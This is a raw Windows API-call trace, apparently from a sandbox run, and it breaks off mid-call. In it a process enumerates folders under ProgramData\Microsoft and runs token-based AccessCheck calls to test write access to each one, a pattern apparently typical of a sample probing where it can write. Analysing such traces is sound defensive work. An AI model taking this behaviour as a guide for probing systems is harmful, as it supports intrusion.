0x5fc198 [0106.198] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0106.198] GetLastError () returned 0x7a [0106.198] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", RequestedInformation=0x7, pSecurityDescriptor=0x572d78, nLength=0x148, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x572d78, lpnLengthNeeded=0x281aa30) returned 1 [0106.198] GetLastError () returned 0x7a [0106.198] GetCurrentThread () returned 0xfffffffe [0106.198] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0106.198] GetCurrentProcess () returned 0xffffffff [0106.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x340) returned 1 [0106.198] DuplicateToken (in: ExistingTokenHandle=0x340, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x320) returned 1 [0106.198] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0106.198] AccessCheck (in: pSecurityDescriptor=0x572d78, ClientToken=0x320, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0106.198] CloseHandle (hObject=0x320) returned 1 [0106.198] CloseHandle (hObject=0x340) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc198, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc198, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc198, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0106.198] FindClose (in: hFindFile=0x5fc198 | out: hFindFile=0x5fc198) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.198] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.198] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.199] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.199] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.199] GetLastError () returned 0x7a [0106.199] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x148, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281afc8) returned 1 [0106.200] GetLastError () returned 0x7a [0106.200] GetCurrentThread () returned 0xfffffffe [0106.200] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.200] GetCurrentProcess () returned 0xffffffff [0106.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.200] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.200] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.200] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.200] CloseHandle (hObject=0x340) returned 1 [0106.200] CloseHandle (hObject=0x32c) returned 1 [0106.200] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.200] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.200] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0x5fc198 [0106.200] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0106.200] GetLastError () returned 0x7a [0106.200] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", RequestedInformation=0x7, pSecurityDescriptor=0x572d78, nLength=0x148, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x572d78, lpnLengthNeeded=0x281aa30) returned 1 [0106.200] GetLastError () returned 0x7a [0106.200] GetCurrentThread () returned 0xfffffffe [0106.200] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0106.200] GetCurrentProcess () returned 0xffffffff [0106.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x340) returned 1 [0106.200] DuplicateToken (in: ExistingTokenHandle=0x340, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x320) returned 1 [0106.200] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0106.200] AccessCheck (in: pSecurityDescriptor=0x572d78, ClientToken=0x320, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0106.201] CloseHandle (hObject=0x320) returned 1 [0106.201] CloseHandle (hObject=0x340) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc198, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc198, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc198, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0106.201] FindClose (in: hFindFile=0x5fc198 | out: hFindFile=0x5fc198) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.201] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.201] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.201] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.201] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.201] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.202] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\DeviceSync", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.202] GetLastError () returned 0x7a [0106.202] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\DeviceSync", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xf0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.202] GetLastError () returned 0x7a [0106.202] GetCurrentThread () returned 0xfffffffe [0106.202] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.202] GetCurrentProcess () returned 0xffffffff [0106.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.202] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.202] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.202] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.202] CloseHandle (hObject=0x344) returned 1 [0106.202] CloseHandle (hObject=0x33c) returned 1 [0106.202] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.202] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.202] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.202] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.202] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.203] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\DRM", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.203] GetLastError () returned 0x7a [0106.203] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\DRM", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.203] GetLastError () returned 0x7a [0106.203] GetCurrentThread () returned 0xfffffffe [0106.203] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.203] GetCurrentProcess () returned 0xffffffff [0106.203] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.203] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.203] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.203] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.203] CloseHandle (hObject=0x344) returned 1 [0106.203] CloseHandle (hObject=0x33c) returned 1 [0106.203] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.203] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.203] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.203] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\DRM\\Server", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.203] GetLastError () returned 0x7a [0106.204] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\DRM\\Server", RequestedInformation=0x7, pSecurityDescriptor=0x572838, nLength=0x7c, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x572838, lpnLengthNeeded=0x281b560) returned 1 [0106.204] GetLastError () returned 0x7a [0106.204] GetCurrentThread () returned 0xfffffffe [0106.204] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.204] GetCurrentProcess () returned 0xffffffff [0106.204] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.204] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.204] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.204] AccessCheck (in: pSecurityDescriptor=0x572838, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.204] CloseHandle (hObject=0x32c) returned 1 [0106.204] CloseHandle (hObject=0x344) returned 1 [0106.204] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.204] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.204] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.204] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.204] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.204] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.204] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.204] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\eHome", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.204] GetLastError () returned 0x7a [0106.204] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\eHome", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xd8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.204] GetLastError () returned 0x7a [0106.204] GetCurrentThread () returned 0xfffffffe [0106.205] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.205] GetCurrentProcess () returned 0xffffffff [0106.205] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.205] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.205] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.205] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.205] CloseHandle (hObject=0x344) returned 1 [0106.205] CloseHandle (hObject=0x33c) returned 1 [0106.205] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.205] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.205] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.205] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\eHome\\logs", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.205] GetLastError () returned 0x7a [0106.205] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\eHome\\logs", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0xd8, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281b560) returned 1 [0106.205] GetLastError () returned 0x7a [0106.205] GetCurrentThread () returned 0xfffffffe [0106.205] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.205] GetCurrentProcess () returned 0xffffffff [0106.205] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.205] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.205] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.205] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.205] CloseHandle (hObject=0x32c) returned 1 [0106.205] CloseHandle (hObject=0x344) returned 1 [0106.205] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.205] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.206] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.206] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.206] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.206] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.206] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.206] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.206] GetLastError () returned 0x7a [0106.206] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xa0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.206] GetLastError () returned 0x7a [0106.206] GetCurrentThread () returned 0xfffffffe [0106.206] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.206] GetCurrentProcess () returned 0xffffffff [0106.206] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.206] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.206] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.206] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.206] CloseHandle (hObject=0x344) returned 1 [0106.206] CloseHandle (hObject=0x33c) returned 1 [0106.206] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.206] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.206] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.207] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer\\Views", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.207] GetLastError () returned 0x7a [0106.207] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer\\Views", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xa0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.207] GetLastError () returned 0x7a [0106.207] GetCurrentThread () returned 0xfffffffe [0106.207] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.207] GetCurrentProcess () returned 0xffffffff [0106.207] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.207] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.207] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.207] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.207] CloseHandle (hObject=0x32c) returned 1 [0106.207] CloseHandle (hObject=0x344) returned 1 [0106.207] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.207] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.207] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.207] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.207] GetLastError () returned 0x7a [0106.207] GetFileSecurityW (in: 